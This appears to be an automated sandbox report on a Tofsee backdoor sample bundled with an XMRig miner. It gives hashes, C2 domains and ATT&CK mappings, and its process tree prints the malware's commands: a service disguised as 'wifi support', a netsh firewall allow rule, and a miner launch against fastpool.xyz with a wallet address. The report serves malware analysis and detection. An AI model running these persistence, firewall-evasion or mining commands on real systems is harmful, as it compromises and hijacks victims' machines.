Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24-09-2022 21:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    084ab9d554c19de78a8e5097b064cb06c20758474be10843f125008b1f46c3ec.exe

  • Size

    196KB

  • MD5

    0e45d8d6ed356ff2fb1e8c717eaf9deb

  • SHA1

    4b1336c5d1dd20d1fb8a024b3cfeb241070cbef5

  • SHA256

    084ab9d554c19de78a8e5097b064cb06c20758474be10843f125008b1f46c3ec

  • SHA512

    7f8703806b82c27f7f95b241f74a9201ca9444e32becb4e29a5ac37bf4cd2abab2768aa9f5063ef98888acb9506483ea9d03c2be8c3d4ef6a3484c1d67ef9489

  • SSDEEP

    3072:jt5B/L3gsZl3N5D/M+NQnHkZaTc+BinMCr/PkkXx:hLrZlTFQnEOw

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\084ab9d554c19de78a8e5097b064cb06c20758474be10843f125008b1f46c3ec.exe
    "C:\Users\Admin\AppData\Local\Temp\084ab9d554c19de78a8e5097b064cb06c20758474be10843f125008b1f46c3ec.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zzefjplw\
      2⤵
        PID:1408
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hynzprng.exe" C:\Windows\SysWOW64\zzefjplw\
        2⤵
          PID:1244
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create zzefjplw binPath= "C:\Windows\SysWOW64\zzefjplw\hynzprng.exe /d\"C:\Users\Admin\AppData\Local\Temp\084ab9d554c19de78a8e5097b064cb06c20758474be10843f125008b1f46c3ec.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1596
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description zzefjplw "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4488
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start zzefjplw
          2⤵
          • Launches sc.exe
          PID:4288
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3580
      • C:\Windows\SysWOW64\zzefjplw\hynzprng.exe
        C:\Windows\SysWOW64\zzefjplw\hynzprng.exe /d"C:\Users\Admin\AppData\Local\Temp\084ab9d554c19de78a8e5097b064cb06c20758474be10843f125008b1f46c3ec.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:772
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2836

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\hynzprng.exe
        Filesize

        12.4MB

        MD5

        195a0c78aa274283cffffee83abca1ac

        SHA1

        4cf2328a01dccd575b8e7c2acd25bf5ec185a43e

        SHA256

        d076e43a44aedc422c7137f4b23b932e87f9041b9baa324f36471181e5f6fd70

        SHA512

        f30463494d726f804f0da023c19bc016d5b19cf6ee9e2ab71ca101c5c06d1948eae98d453598667ff8ec6d502593109757b3404fcfd005b3017be2b003332778

        Download Submit
      • C:\Windows\SysWOW64\zzefjplw\hynzprng.exe
        Filesize

        12.4MB

        MD5

        195a0c78aa274283cffffee83abca1ac

        SHA1

        4cf2328a01dccd575b8e7c2acd25bf5ec185a43e

        SHA256

        d076e43a44aedc422c7137f4b23b932e87f9041b9baa324f36471181e5f6fd70

        SHA512

        f30463494d726f804f0da023c19bc016d5b19cf6ee9e2ab71ca101c5c06d1948eae98d453598667ff8ec6d502593109757b3404fcfd005b3017be2b003332778

        Download Submit
      • memory/772-484-0x0000000000F50000-0x0000000000F65000-memory.dmp
        Filesize

        84KB

        Download
      • memory/772-389-0x0000000000F50000-0x0000000000F65000-memory.dmp
        Filesize

        84KB

        Download
      • memory/772-307-0x0000000000F59A6B-mapping.dmp
        Download
      • memory/1244-173-0x0000000000000000-mapping.dmp
        Download
      • memory/1244-175-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1244-176-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1244-174-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1244-177-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1244-178-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1408-169-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1408-172-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1408-171-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1408-170-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1408-167-0x0000000000000000-mapping.dmp
        Download
      • memory/1408-168-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1596-185-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1596-179-0x0000000000000000-mapping.dmp
        Download
      • memory/1596-180-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1596-181-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1596-182-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1596-183-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/1596-187-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-137-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-138-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-144-0x0000000000640000-0x000000000078A000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2244-145-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-143-0x0000000000640000-0x000000000078A000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2244-146-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-147-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-148-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-149-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-150-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-151-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-152-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-153-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-154-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-155-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-156-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-157-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-158-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-159-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-160-0x0000000000400000-0x000000000058B000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2244-161-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-162-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-163-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-164-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-165-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-166-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-141-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-140-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-139-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-142-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-116-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-136-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-135-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-134-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-133-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-132-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-130-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-129-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-128-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-125-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-127-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-126-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-124-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-123-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-117-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-122-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-118-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-121-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-119-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-120-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2244-216-0x0000000000400000-0x000000000058B000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2836-519-0x0000000000B7259C-mapping.dmp
        Download
      • memory/3580-213-0x0000000000000000-mapping.dmp
        Download
      • memory/4044-282-0x0000000000690000-0x00000000007DA000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/4044-285-0x0000000000690000-0x00000000007DA000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/4044-310-0x0000000000400000-0x000000000058B000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/4288-196-0x0000000000000000-mapping.dmp
        Download
      • memory/4488-188-0x0000000077470000-0x00000000775FE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4488-186-0x0000000000000000-mapping.dmp
        Download